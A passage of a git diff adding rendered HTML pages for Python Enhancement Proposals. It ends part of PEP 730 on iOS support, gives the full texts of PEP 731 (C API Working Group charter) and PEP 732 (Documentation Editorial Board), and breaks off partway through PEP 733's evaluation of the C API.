A traditional python.exe command line experience isn’t really viable on +mobile devices, because mobile devices don’t have a command line. iOS apps don’t +have a stdout, stderr or stdin; and while you can redirect stdout and stderr to +the system log, there’s no source for stdin that exists that doesn’t also +involve building a very specific user-facing app that would be closer to an +IDLE-style IDE experience. Therefore, the decision was made to only focus on +“embedded mode” as a target for mobile distribution.

+
+
+

x86_64 simulator support

+

Apple no longer sells x86_64 hardware. As a result, commissioning an x86_64 +buildbot can be difficult. It is possible to run macOS binaries in x86_64 +compatibility mode on ARM64 hardware; however, this isn’t ideal for testing +purposes. Therefore, the x86_64 Simulator (x86_64-apple-ios-simulator) will +not be added as a Tier 3 target. It is highly likely that iOS support will work +on the x86_64 without any modification; this only impacts on the official Tier +3 status.

+
+
+

On-device testing

+

CI testing on simulators can be accommodated reasonably easily. On-device +testing is much harder, as availability of device farms that could be configured +to provide Buildbots or Github Actions runners is limited.

+

However, on device testing may not be necessary. As a data point - Apple’s Xcode +Cloud solution doesn’t provide on-device testing. They rely on the fact that the +API is consistent between device and simulator, and ARM64 simulator testing is +sufficient to reveal CPU-specific issues.

+
+
+

Ordering of _multiarch tags

+

The initially accepted version of this document used <platform>-<arch> +ordering (e.g., iphoneos-arm64) for sys.implementation._multiarch (and +related values, such as wheel tags). The final merged version uses the +<arch>-<platform> ordering (e.g., arm64-iphoneos). This is for +consistency with compiler triples on other platforms (especially Linux), which +specify the architecture before the operating system.

+
+
+

Values returned by platform.ios_ver()

+

The initially accepted version of this document didn’t include a system +identifier. This was added during the implementation phase to support the implementation of platform.system().

+

The initially accepted version of this document also described that +min_release would be returned in the ios_ver() result. The final version +omits the min_release value, as it is not significant at runtime; it only +impacts on binary compatibility. The minimum version is included in the value +returned by sysconfig.get_platform(), as this is used to define wheel (and +other binary) compatibility.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0730.rst

+

Last modified: 2024-10-07 20:43:11 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0731/index.html b/pep-0731/index.html new file mode 100644 index 00000000000..f0e68b2c8e9 --- /dev/null +++ b/pep-0731/index.html @@ -0,0 +1,333 @@ + + + + + + + + PEP 731 – C API Working Group Charter | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 731 – C API Working Group Charter

+
+
Author:
+
Guido van Rossum <guido at python.org>, +Petr Viktorin <encukou at gmail.com>, +Victor Stinner <vstinner at python.org>, +Steve Dower <steve.dower at python.org>, +Irit Katriel <irit at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance
+
Created:
+
11-Oct-2023
+
Post-History:
+
13-Oct-2023, +23-May-2024, +19-Jun-2024
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to establish the C API Working Group: +a small committee of Python core developers responsible for +overseeing and coordinating the development and maintenance of the Python C API.

+

The working group will maintain +documentation, test suites and tooling related to Python’s C API. +As delegated by the Steering Council +it is the deciding body for changes to the C API, +from the addition or removal of individual API functions, types, etc., +to the acceptance of new designs of a more or less radical nature.

+

The working group’s mandate is to represent the interests of all Python users, +but especially all maintainers of code that uses Python’s C API, +whether in the context of CPython, using an alternate Python implementation, +or using a binding framework for other programming languages (such as C++ and Rust).

+

The working group serves at the pleasure of the Python Steering Council. +This document serves as the working group’s charter.

+
+
+

Epigraph

+
+
KEEPER
+
Stop! +Who would cross the Bridge of Death must answer me these questions three, +ere the other side he see.
+
+
    +
  1. What was Python named after?
  2. +
  3. What was Python 2’s EOL?
  4. +
  5. What is the optimal strategy to evolve the CPython C API?
  6. +
+
+
LANCELOT
+
Auuuuuuuugh!
+
+
+
+

Motivation

+

Despite many discussions and in-person meetings +at core developer sprints and Language Summits, +and a thorough inventory of the problems and stakeholders of the C API, +no consensus has been reached about many contentious issues, +including, but not limited to:

+
    +
  • Conventions for designing new API functions;
  • +
  • How to deal with compatibility;
  • +
  • What’s the best strategy for handling errors;
  • +
  • The future of the Stable ABI and the Limited API;
  • +
  • Whether to switch to a handle-based API convention (and how).
  • +
+

The general feeling is that there are too many stakeholders, +proposals, requirements, constraints, and conventions, +to make progress without having a small trusted group of deciders.

+

At the 2023 Language Summit in Salt Lake City it was decided to start work on +an inventory of problems. +At the 2023 core developer sprint in Brno this work is more or less finished +and after a discussion it appeared that the next step is to establish +a working group to ensure that we’re not stymied forever.

+

The Steering Council has +indicated +its desire to delegate decisions about the C API +to such a working group, anticipating its formal establishment.

+
+
+

Specification

+

We propose the creation of a new group, the C API Working Group. +This group will be responsible for overseeing and coordinating the development and +maintenance of the Python C API. +It will do this by establishing the principles underpinning the work +and publishing guidelines that the core developers can refer to.

+

The “operations and process” section below describes +how the working group operates and how it is governed.

+
+

Members

+

The members of the working group are:

+
    +
  • Erlend Aasland
  • +
  • Michael Droettboom
  • +
  • Petr Viktorin
  • +
  • Serhiy Storchaka
  • +
  • Steve Dower
  • +
  • Victor Stinner
  • +
+
+
+

Mandate

+

The working group’s mandate is to ensure that the Python C API +is suitable for all users of and contributors to the API, +without unduly preferencing one group over another. +The working group will identify exemplar stakeholders, +their needs and preferences, +and will determine a plan for meeting these needs equitably and sustainably. +It will oversee execution of the plan.

+
+
+

Operations and process

+

The working group has at least three members, +comprised of prominent Python core developers. +The members should consider the needs of the various stakeholders carefully.

+

The Steering Council appoints the initial working group. +There is no term limit for working group members. +Working group members may resign their position at any time, for any reason. +There is an expectation that the membership will change over time.

+

To determine replacements, +nominations will be collected from the core developer community. +Self-nominations are allowed. +The existing working group will then decide the replacement member(s) +from the nominees. +The expectation is that this will be done by fiat, +but the working group can choose a replacement by any means they see fit, +including a vote.

+

The working group remains accountable to the Steering Council. +At any point, for any reason, the Steering Council could +(publicly or privately) make a specific change +or request a non-specific change to the composition of the working group.

+

We acknowledge that this is not a particularly democratic structure +and puts a lot of faith in the working group. +However, the Python community has a long history of success +with structures that are not fully democratic! +We believe that self-governance, cycling of membership, +and accountability to the Steering Council will be sufficient +to ensure that the C API workgroup is meeting the needs of the community.

+

The working group may operate primarily through reviews of GitHub issues and PRs. +Regular meetings are likely not necessary, +but the working group may set up video calls, +a private chat, or whatever other mechanism they decide upon internally.

+

The working group should aim for transparency, +posting all decisions publicly on +discuss.python.org, +with a rationale if possible. +Before making a decision, the working group should give +all interested community members +(as examples of different categories of stakeholders) +a chance to weigh in. +There should be at least a week between the start of a discussion +and the working group’s decision.

+
+

Relationship with the Steering Council

+

Just like today, the Python Steering Council remains responsible +for the overall direction of the Python C API +and continues to decide on PEPs related to the C API, +using the standard PEP review process (community discussion, etc.). +The C API working group provides written opinions and +recommendations to the Steering Council on PEPs related to the C API.

+

However, the working group can make smaller C API changes directly. +The Steering Council may also choose to delegate decisions on some PEPs +to the working group (exactly as any other PEP delegation).

+
+
+
+

Amendments

+

This PEP serves as a charter for the working group. +Changes to its operation can be made either through a new PEP +or through a change to this PEP. +In either case, the change will be decided upon +by the Steering Council after discussion in the community.

+
+
+
+

Contact

+

To ask the C API Working Group for a decision, +community members may open an issue in the +capi-workgroup/decisions +repository.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0731.rst

+

Last modified: 2024-06-27 15:01:11 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0732/index.html b/pep-0732/index.html new file mode 100644 index 00000000000..8c1cd7c6b63 --- /dev/null +++ b/pep-0732/index.html @@ -0,0 +1,345 @@ + + + + + + + + PEP 732 – The Python Documentation Editorial Board | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 732 – The Python Documentation Editorial Board

+
+
Author:
+
Joanna Jablonski
+
Sponsor:
+
Mariatta Wijaya
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance
+
Created:
+
14-Oct-2023
+
Post-History:
+
20-Oct-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP:

+
    +
  • Establishes the Python Documentation Editorial Board
  • +
  • Proposes how the editorial board will work
  • +
+
+
+

Motivation

+

The Steering Council approved the creation of a +Documentation Working Group +in March 2021 to set direction for the docs. This group +is now called the Editorial Board to differentiate it +from the Documentation Working Group that was created +since then to focus on more tactical work.

+

The purpose of the Python documentation is to serve the +present and future end users of Python. As such, the core +development community and the greater Python documentation +contributors work together to achieve this:

+Three concentric circles. At the centre: Documentation Editorial Board, trusted group. Around this: Documentation Working Group, volunteers who contribute to the docs. Finally, the outer circle is the world, includes readers of the documentation. + +
+
+

Specification

+
+

Mandate

+

The editorial board will:

+
    +
  • Ensure processes are in place to maintain and improve the quality of Python’s documentation
  • +
  • Foster Python documentation as a community resource to serve the current and future users
  • +
  • Act in alignment with the Python Software Foundation mission, which is to advance the Python +programming language, and to support and facilitate the growth of a diverse +and international community of Python programmers
  • +
  • Ensure that contributing to documentation is accessible, inclusive, and sustainable
  • +
  • Establish appropriate decision-making processes for documentation content
  • +
  • Seek to achieve consensus among contributors prior to making decisions
  • +
  • Be the final arbiter for documentation content decisions
  • +
+
+
+

Responsibilities

+

The board has authority to make decisions about Python’s +documentation, as scoped below. For example, it can:

+
    +
  • Set big-picture strategy for Python’s documentation
  • +
  • Set the intended structure for documentation
  • +
  • Make style and editorial decisions for both writing and design
  • +
  • Handle documentation governance (for example, delegation of decision-making +to subject-matter experts, resolution of disagreements, decisions.)
  • +
+
+
+

Scope

+

The Editorial board oversees the content and strategy for the following:

+ ++++ + + + + + + + + + + + + + + + + + + + + + + + + + +
In scopeNot in scope
CPython documentation (docs.python.org)Code comments in CPython codebase
CPython devguide (devguide.python.org)CPython docstrings
Translations of CPython docsPEPs (peps.python.org)
PyPA documentation
www.python.org
The Python Wiki (wiki.python.org)
+
+

Composition

+

The Python Documentation Editorial Board is composed of five members.

+
+
+

Editorial Board Members

+

The initial Editorial Board members are:

+
    +
  • Mariatta Wijaya
  • +
  • Ned Batchelder
  • +
  • Joanna Jablonski
  • +
  • Guido van Rossum
  • +
  • Carol Willing
  • +
+
+
+

Editorial Board Member Qualifications

+

Editorial board members should have:

+
    +
  • A good grasp of the philosophy of the Python project
  • +
  • A background in Python education and developer-facing documentation
  • +
  • A solid track record of being constructive and helpful
  • +
  • A history of making significant contributions to Python
  • +
  • A willingness to dedicate time to improving Python’s docs
  • +
+

Members of the Editorial Board should have experience in education, +communication, technical writing, Python’s documentation, accessibility, +translation, or community management.

+
+
+

Term

+

Editorial Board members serve for an indefinite term, though it is +generally expected that there will be changes in Editorial Board +composition each year. Editorial Board members will confirm annually +whether they wish to continue as a board member. Members may resign +at any time.

+

If a board member drops out of touch and cannot be contacted for a +month or longer, then the rest of the board may vote to replace them.

+
+
+

Changes to the Editorial Board’s Size

+

Annually after each major Python release, the Editorial Board will +review whether the board’s size should change. This provides +flexibility if the needs of the documentation community change +over time. A simple majority is needed to make a decision to +increase the board’s size where quorum is 80% of the current board.

+

As the sponsoring organization of the Documentation Editorial +Board, the Steering Council may change the number of members of +the Board at any time, including appointing new members or +dismissing existing members.

+
+
+

Vacancies

+

If a vacancy exists on the board for any reason, the Documentation +Editorial Board will publicly announce a call for prospective +board members. Prospective board members would submit a brief +document stating qualifications and their motivation to serve. +The sitting members of the Editorial Board will select new board +members by a simple majority where quorum is 80% of the current board.

+
+
+
+
+

Amendments

+

This PEP serves as a charter for the Docs Editorial Board. Changes +to its operation can be made either through a new PEP or through +a change to this PEP. In either case, the change would be decided +upon by the Steering Council after discussion in the community.

+
+
+

PEP Acceptance

+

PEP 732 was accepted by the Python Steering Council on December 11, 2023.

+

The Steering Council commented that, while they don’t disagree with the +scoping set out in the PEP, it would probably make +sense for the Editorial Board to consider expanding the scope to include +docstrings in the standard library, once the Board is sufficiently established +and the higher priorities have been taken care of.

+
+
+

Contact

+

To ask the Editorial Board for a decision, +community members may open an issue in the +python/editorial-board +repository.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0732.rst

+

Last modified: 2024-02-28 06:14:55 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0733/index.html b/pep-0733/index.html new file mode 100644 index 00000000000..cb8a3c3f6ba --- /dev/null +++ b/pep-0733/index.html @@ -0,0 +1,781 @@ + + + + + + + + PEP 733 – An Evaluation of Python’s Public C API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 733 – An Evaluation of Python’s Public C API

+
+
Author:
+
Erlend Egeberg Aasland <erlend at python.org>, +Domenico Andreoli <domenico.andreoli at linux.com>, +Stefan Behnel <stefan_ml at behnel.de>, +Carl Friedrich Bolz-Tereick <cfbolz at gmx.de>, +Simon Cross <hodgestar at gmail.com>, +Steve Dower <steve.dower at python.org>, +Tim Felgentreff <tim.felgentreff at oracle.com>, +David Hewitt <1939362+davidhewitt at users.noreply.github.com>, +Shantanu Jain <hauntsaninja at gmail.com>, +Wenzel Jakob <wenzel.jakob at epfl.ch>, +Irit Katriel <irit at python.org>, +Marc-Andre Lemburg <mal at lemburg.com>, +Donghee Na <donghee.na at python.org>, +Karl Nelson <nelson85 at llnl.gov>, +Ronald Oussoren <ronaldoussoren at mac.com>, +Antoine Pitrou <solipsis at pitrou.net>, +Neil Schemenauer <nas at arctrix.com>, +Mark Shannon <mark at hotpy.org>, +Stepan Sindelar <stepan.sindelar at oracle.com>, +Gregory P. Smith <greg at krypto.org>, +Eric Snow <ericsnowcurrently at gmail.com>, +Victor Stinner <vstinner at python.org>, +Guido van Rossum <guido at python.org>, +Petr Viktorin <encukou at gmail.com>, +Carol Willing <willingc at gmail.com>, +William Woodruff <william at yossarian.net>, +David Woods <dw-git at d-woods.co.uk>, +Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
16-Oct-2023
+
Post-History:
+
01-Nov-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This informational PEP describes our shared view of the public C API. The +document defines:

+
    +
  • purposes of the C API
  • +
  • stakeholders and their particular use cases and requirements
  • +
  • strengths of the C API
  • +
  • problems of the C API categorized into nine areas of weakness
  • +
+

This document does not propose solutions to any of the identified problems. By +creating a shared list of C API issues, this document will help to guide +continuing discussion about change proposals and to identify evaluation +criteria.

+
+
+

Introduction

+

Python’s C API was not designed for the different purposes it currently +fulfills. It evolved from what was initially the internal API between +the C code of the interpreter and the Python language and libraries. +In its first incarnation, it was exposed to make it possible to embed +Python into C/C++ applications and to write extension modules in C/C++. +These capabilities were instrumental to the growth of Python’s ecosystem. +Over the decades, the C API grew to provide different tiers of stability, +conventions changed, and new usage patterns have emerged, such as bindings +to languages other than C/C++. In the next few years, new developments +are expected to further test the C API, such as the removal of the GIL +and the development of a JIT compiler. However, this growth was not +supported by clearly documented guidelines, resulting in inconsistent +approaches to API design in different subsystems of CPython. In addition, +CPython is no longer the only implementation of Python, and some of the +design decisions made when it was, are difficult for alternative +implementations to work with +[Issue 64]. +In the meantime, lessons were learned and mistakes in both the design +and the implementation of the C API were identified.

+

Evolving the C API is hard due to the combination of backwards +compatibility constraints and its inherent complexity, both +technical and social. Different types of users bring different, +sometimes conflicting, requirements. The tradeoff between stability +and progress is an ongoing, highly contentious topic of discussion +when suggestions are made for incremental improvements. +Several proposals have been put forward for improvement, redesign +or replacement of the C API, each representing a deep analysis of +the problems. At the 2023 Language Summit, three back-to-back +sessions were devoted to different aspects of the C API. There is +general agreement that a new design can remedy the problems that +the C API has accumulated over the last 30 years, while at the +same time updating it for use cases that it was not originally +designed for.

+

However, there was also a sense at the Language Summit that we are +trying to discuss solutions without a clear common understanding +of the problems that we are trying to solve. We decided that +we need to agree on the current problems with the C API, before +we are able to evaluate any of the proposed solutions. We +therefore created the +capi-workgroup +repository on GitHub in order to collect everyone’s ideas on that +question.

+

Over 60 different issues were created on that repository, each +describing a problem with the C API. We categorized them and +identified a number of recurring themes. The sections below +mostly correspond to these themes, and each contains a combined +description of the issues raised in that category, along with +links to the individual issues. In addition, we included a section +that aims to identify the different stakeholders of the C API, +and the particular requirements that each of them has.

+
+
+

C API Stakeholders

+

As mentioned in the introduction, the C API was originally +created as the internal interface between CPython’s +interpreter and the Python layer. It was later exposed as +a way for third-party developers to extend and embed Python +programs. Over the years, new types of stakeholders emerged, +with different requirements and areas of focus. This section +describes this complex state of affairs in terms of the +actions that different stakeholders need to perform through +the C API.

+
+

Common Actions for All Stakeholders

+

There are actions which are generic, and required by +all types of API users:

+
    +
  • Define functions and call them
  • +
  • Define new types
  • +
  • Create instances of builtin and user-defined types
  • +
  • Perform operations on object instances
  • +
  • Introspect objects, including types, instances, and functions
  • +
  • Raise and handle exceptions
  • +
  • Import modules
  • +
  • Access to Python’s OS interface
  • +
+

The following sections look at the unique requirements of various stakeholders.

+
+
+

Extension Writers

+

Extension writers are the traditional users of the C API. Their requirements +are the common actions listed above. They also commonly need to:

+
    +
  • Create new modules
  • +
  • Efficiently interface between modules at the C level
  • +
+
+
+

Authors of Embedded Python Applications

+

Applications with an embedded Python interpreter. Examples are +Blender and +OBS.

+

They need to be able to:

+
    +
  • Configure the interpreter (import paths, inittab, sys.argv, memory +allocator, etc.).
  • +
  • Interact with the execution model and program lifetime, including +clean interpreter shutdown and restart.
  • +
  • Represent complex data models in a way Python can use without +having to create deep copies.
  • +
  • Provide and import frozen modules.
  • +
  • Run and manage multiple independent interpreters (in particular, when +embedded in a library that wants to avoid global effects).
  • +
+
+
+

Python Implementations

+

Python implementations such as +CPython, +PyPy, +GraalPy, +IronPython, +RustPython, +MicroPython, +and Jython), may take +very different approaches for the implementation of +different subsystems. They need:

+
    +
  • The API to be abstract and hide implementation details.
  • +
  • A specification of the API, ideally with a test suite +that ensures compatibility.
  • +
  • It would be nice to have an ABI that can be shared +across Python implementations.
  • +
+
+
+

Alternative APIs and Binding Generators

+

There are several projects that implement alternatives to the +C API, which offer extension users advantanges over programming +directly with the C API. These APIs are implemented with the +C API, and in some cases by using CPython internals.

+

There are also libraries that create bindings between Python and +other object models, paradigms or languages.

+

There is overlap between these categories: binding generators +usually provide alternative APIs, and vice versa.

+

Examples are +Cython, +cffi, +pybind11 and +nanobind for C++, +PyO3 for Rust, +Shiboken used by +PySide for Qt, +PyGObject for GTK, +Pygolo for Go, +JPype for Java, +PyJNIus for Android, +PyObjC for Objective-C, +SWIG for C/C++, +Python.NET for .NET (C#), +HPy, +Mypyc, +Pythran and +pythoncapi-compat. +CPython’s DSL for parsing function arguments, the +Argument Clinic, +can also be seen as belonging to this category of stakeholders.

+

Alternative APIs need minimal building blocks for accessing CPython +efficiently. They don’t necessarily need an ergonomic API, because +they typically generate code that is not intended to be read +by humans. But they do need it to be comprehensive enough so that +they can avoid accessing internals, without sacrificing performance.

+

Binding generators often need to:

+
    +
  • Create custom objects (e.g. function/module objects +and traceback entries) that match the behavior of equivalent +Python code as closely as possible.
  • +
  • Dynamically create objects which are static in traditional +C extensions (e.g. classes/modules), and need CPython to manage +their state and lifetime.
  • +
  • Dynamically adapt foreign objects (strings, GC’d containers), with +low overhead.
  • +
  • Adapt external mechanisms, execution models and guarantees to the +Python way (stackful coroutines, continuations, +one-writer-or-multiple-readers semantics, virtual multiple inheritance, +1-based indexing, super-long inheritance chains, goroutines, channels, +etc.).
  • +
+

These tools might also benefit from a choice between a more stable +and a faster (possibly lower-level) API. Their users could +then decide whether they can afford to regenerate the code often or +trade some performance for more stability and less maintenance work.

+
+
+
+

Strengths of the C API

+

While the bulk of this document is devoted to problems with the +C API that we would like to see fixed in any new design, it is +also important to point out the strengths of the C API, and to +make sure that they are preserved.

+

As mentioned in the introduction, the C API enabled the +development and growth of the Python ecosystem over the last +three decades, while evolving to support use cases that it was +not originally designed for. This track record in itself is +indication of how effective and valuable it has been.

+

A number of specific strengths were mentioned in the +capi-workgroup discussions. Heap types were identified +as much safer and easier to use than static types +[Issue 4].

+

API functions that take a C string literal for lookups based +on a Python string are very convenient +[Issue 30].

+

The limited API demonstrates that an API which hides implementation +details makes it easier to evolve Python +[Issue 30].

+
+
+

C API problems

+

The remainder of this document summarizes and categorizes the problems that were reported on +the capi-workgroup repository. +The issues are grouped into several categories.

+
+

API Evolution and Maintenance

+

The difficulty of making changes in the C API is central to this report. It is +implicit in many of the issues we discuss here, particularly when we need to +decide whether an incremental bugfix can resolve the issue, or whether it can +only be addressed as part of an API redesign +[Issue 44]. The +benefit of each incremental change is often viewed as too small to justify the +disruption. Over time, this implies that every mistake we make in an API’s +design or implementation remains with us indefinitely.

+

We can take two views on this issue. One is that this is a problem and the +solution needs to be baked into any new C API we design, in the form of a +process for incremental API evolution, which includes deprecation and +removal of API elements. The other possible approach is that this is not +a problem to be solved, but rather a feature of any API. In this +view, API evolution should not be incremental, but rather through large +redesigns, each of which learns from the mistakes of the past and is not +shackled by backwards compatibility requirements (in the meantime, new +API elements may be added, but nothing can ever be removed). A compromise +approach is somewhere between these two extremes, fixing issues which are +easy or important enough to tackle incrementally, and leaving others alone.

+

The problem we have in CPython is that we don’t have an agreed, official +approach to API evolution. Different members of the core team are pulling in +different directions and this is an ongoing source of disagreements. +Any new C API needs to come with a clear decision about the model +that its maintenance will follow, as well as the technical and +organizational processes by which this will work.

+

If the model does include provisions for incremental evolution of the API, +it will include processes for managing the impact of the change on users +[Issue 60], +perhaps through introducing an external backwards compatibility module +[Issue 62], +or a new API tier of “blessed” functions +[Issue 55].

+
+
+

API Specification and Abstraction

+

The C API does not have a formal specification, it is currently defined +as whatever the reference implementation (CPython) contains in a +particular version. The documentation acts as an incomplete description, +which is not sufficient for verifying the correctness of either the full +API, the limited API, or the stable ABI. As a result, the C API may +change significantly between releases without needing a more visible +specification update, and this leads to a number of problems.

+

Bindings for languages other than C/C++ must parse C code +[Issue 7]. +Some C language features are hard to handle in this way, because +they produce compiler-dependent output (such as enums) or require +a C preprocessor/compiler rather than just a parser (such as macros) +[Issue 35].

+

Furthermore, C header files tend to expose more than what is intended +to be part of the public API +[Issue 34]. +In particular, implementation details such as the precise memory +layouts of internal data structures can be exposed +[Issue 22 +and PEP 620]. +This can make API evolution very difficult, in particular when it +occurs in the stable ABI as in the case of ob_refcnt and ob_type, +which are accessed via the reference counting macros +[Issue 45].

+

We identified a deeper issue in relation to the way that reference +counting is exposed. The way that C extensions are required to +manage references with calls to Py_INCREF and Py_DECREF is +specific to CPython’s memory model, and is hard for alternative +Python implementations to emulate. +[Issue 12].

+

Another set of problems arises from the fact that a PyObject* is +exposed in the C API as an actual pointer rather than a handle. The +address of an object serves as its ID and is used for comparison, +and this complicates matters for alternative Python implementations +that move objects during GC +[Issue 37].

+

A separate issue is that object references are opaque to the runtime, +discoverable only through calls to tp_traverse/tp_clear, +which have their own purposes. If there was a way for the runtime to +know the structure of the object graph, and keep up with changes in it, +this would make it possible for alternative implementations to implement +different memory management schemes +[Issue 33].

+
+
+

Object Reference Management

+

There does not exist a consistent naming convention for functions +which makes their reference semantics obvious, and this leads to +error prone C API functions, where they do not follow the typical +behaviour. When a C API function returns a PyObject*, the +caller typically gains ownership of a reference to the object. +However, there are exceptions where a function returns a +“borrowed” reference, which the caller can access but does not own +a reference to. Similarly, functions typically do not change the +ownership of references to their arguments, but there are +exceptions where a function “steals” a reference, i.e., the +ownership of the reference is permanently transferred from the +caller to the callee by the call +[Issue 8 +and Issue 52]. +The terminology used to describe these situations in the documentation +can also be improved +[Issue 11].

+

A more radical change is necessary in the case of functions that +return “borrowed” references (such as PyList_GetItem) +[Issue 5 and +Issue 21] +or pointers to parts of the internal structure of an object +(such as PyBytes_AsString) +[Issue 57]. +In both cases, the reference/pointer is valid for as long as the +owning object holds the reference, but this time is hard to reason about. +Such functions should not exist in the API without a mechanism that can +make them safe.

+

For containers, the API is currently missing bulk operations on the +references of contained objects. This is particularly important for +a stable ABI where INCREF and DECREF cannot be macros, making +bulk operations expensive when implemented as a sequence of function +calls +[Issue 15].

+
+
+

Type Definition and Object Creation

+

The C API has functions that make it possible to create incomplete +or inconsistent Python objects, such as PyTuple_New and +PyUnicode_New. This causes problems when the object is tracked +by GC or its tp_traverse/tp_clear functions are called. +A related issue is with functions such as PyTuple_SetItem +which is used to modify a partially initialized tuple (tuples +are immutable once fully initialized) +[Issue 56].

+

We identified a few issues with type definition APIs. For legacy +reasons, there is often a significant amount of code duplication +between tp_new and tp_vectorcall +[Issue 24]. +The type slot function should be called indirectly, so that their +signatures can change to include context information +[Issue 13]. +Several aspects of the type definition and creation process are not +well defined, such as which stage of the process is responsible for +initializing and clearing different fields of the type object +[Issue 49].

+
+
+

Error Handling

+

Error handling in the C API is based on the error indicator which is stored +on the thread state (in global scope). The design intention was that each +API function returns a value indicating whether an error has occurred (by +convention, -1 or NULL). When the program knows that an error +occurred, it can fetch the exception object which is stored in the +error indicator. We identified a number of problems which are related +to error handling, pointing at APIs which are too easy to use incorrectly.

+

There are functions that do not report all errors that occur while they +execute. For example, PyDict_GetItem clears any errors that occur +when it calls the key’s hash function, or while performing a lookup +in the dictionary +[Issue 51].

+

Python code never executes with an in-flight exception (by definition), +and typically code using native functions should also be interrupted by +an error being raised. This is not checked in most C API functions, and +there are places in the interpreter where error handling code calls a C API +function while an exception is set. For example, see the call to +PyUnicode_FromString in the error handler of _PyErr_WriteUnraisableMsg +[Issue 2].

+

There are functions that do not return a value, so a caller is forced to +query the error indicator in order to identify whether an error has occurred. +An example is PyBuffer_Release +[Issue 20]. +There are other functions which do have a return value, but this return value +does not unambiguously indicate whether an error has occurred. For example, +PyLong_AsLong returns -1 in case of error, or when the value of the +argument is indeed -1 +[Issue 1]. +In both cases, the API is error prone because it is possible that the +error indicator was already set before the function was called, and the +error is incorrectly attributed. The fact that the error was not detected +before the call is a bug in the calling code, but the behaviour of the +program in this case doesn’t make it easy to identify and debug the +problem.

+

There are functions that take a PyObject* argument, with special meaning +when it is NULL. For example, if PyObject_SetAttr receives NULL as +the value to set, this means that the attribute should be cleared. This is error +prone because it could be that NULL indicates an error in the construction +of the value, and the program failed to check for this error. The program will +misinterpret the NULL to mean something different than error +[Issue 47].

+
+
+

API Tiers and Stability Guarantees

+

The different API tiers provide different tradeoffs of stability vs +API evolution, and sometimes performance.

+

The stable ABI was identified as an area that needs to be looked into. At +the moment it is incomplete and not widely adopted. At the same time, its +existence is making it hard to make changes to some implementation +details, because it exposes struct fields such as ob_refcnt, +ob_type and ob_size. There was some discussion about whether +the stable ABI is worth keeping. Arguments on both sides can be +found in [Issue 4] +and [Issue 9].

+

Alternatively, it was suggested that in order to be able to evolve +the stable ABI, we need a mechanism to support multiple versions of +it in the same Python binary. It was pointed out that versioning +individual functions within a single ABI version is not enough +because it may be necessary to evolve, together, a group of functions +that interoperate with each other +[Issue 39].

+

The limited API was introduced in 3.2 as a blessed subset of the C API +which is recommended for users who would like to restrict themselves +to high quality APIs which are not likely to change often. The +Py_LIMITED_API flag allows users to restrict their program to older +versions of the limited API, but we now need the opposite option, to +exclude older versions. This would make it possible to evolve the +limited API by replacing flawed elements in it +[Issue 54]. +More generally, in a redesign we should revisit the way that API +tiers are specified and consider designing a method that will unify the +way we currently select between the different tiers +[Issue 59].

+

API elements whose names begin with an underscore are considered +private, essentially an API tier with no stability guarantees. +However, this was only clarified recently, in PEP 689. It is +not clear what the change policy should be with respect to such +API elements that predate PEP 689 +[Issue 58].

+

There are API functions which have an unsafe (but fast) version as well as +a safe version which performs error checking (for example, +PyTuple_GET_ITEM vs PyTuple_GetItem). It may help to +be able to group them into their own tiers - the “unsafe API” tier and +the “safe API” tier +[Issue 61].

+
+
+

Use of the C Language

+

A number of issues were raised with respect to the way that CPython +uses the C language. First there is the issue of which C dialect +we use, and how we test our compatibility with it, as well as API +header compatibility with C++ dialects +[Issue 42].

+

Usage of const in the API is currently sparse, but it is not +clear whether this is something that we should consider changing +[Issue 38].

+

We currently use the C types long and int, where fixed-width integers +such as int32_t and int64_t may now be better choices +[Issue 27].

+

We are using C language features which are hard for other languages +to interact with, such as macros, variadic arguments, enums, bitfields, +and non-function symbols +[Issue 35].

+

There are API functions that take a PyObject* arg which must be +of a more specific type (such as PyTuple_Size, which fails if +its arg is not a PyTupleObject*). It is an open question whether this +is a good pattern to have, or whether the API should expect the +more specific type +[Issue 31].

+

There are functions in the API that take concrete types, such as +PyDict_GetItemString which performs a dictionary lookup for a key +specified as a C string rather than PyObject*. At the same time, +for PyDict_ContainsString it is not considered appropriate to +add a concrete type alternative. The principle around this should +be documented in the guidelines +[Issue 23].

+
+
+

Implementation Flaws

+

Below is a list of localized implementation flaws. Most of these can +probably be fixed incrementally, if we choose to do so. They should, +in any case, be avoided in any new API design.

+

There are functions that don’t follow the convention of +returning 0 for success and -1 for failure. For +example, PyArg_ParseTuple returns 0 for success and +non-zero for failure +[Issue 25].

+

The macros Py_CLEAR and Py_SETREF access their arg more than +once, so if the arg is an expression with side effects, they are +duplicated +[Issue 3].

+

The meaning of Py_SIZE depends on the type and is not always +reliable +[Issue 10].

+

Some API function do not have the same behaviour as their Python +equivalents. The behaviour of PyIter_Next is different from +tp_iternext. +[Issue 29]. +The behaviour of PySet_Contains is different from set.__contains__ +[Issue 6].

+

The fact that PyArg_ParseTupleAndKeywords takes a non-const +char* array as argument makes it more difficult to use +[Issue 28].

+

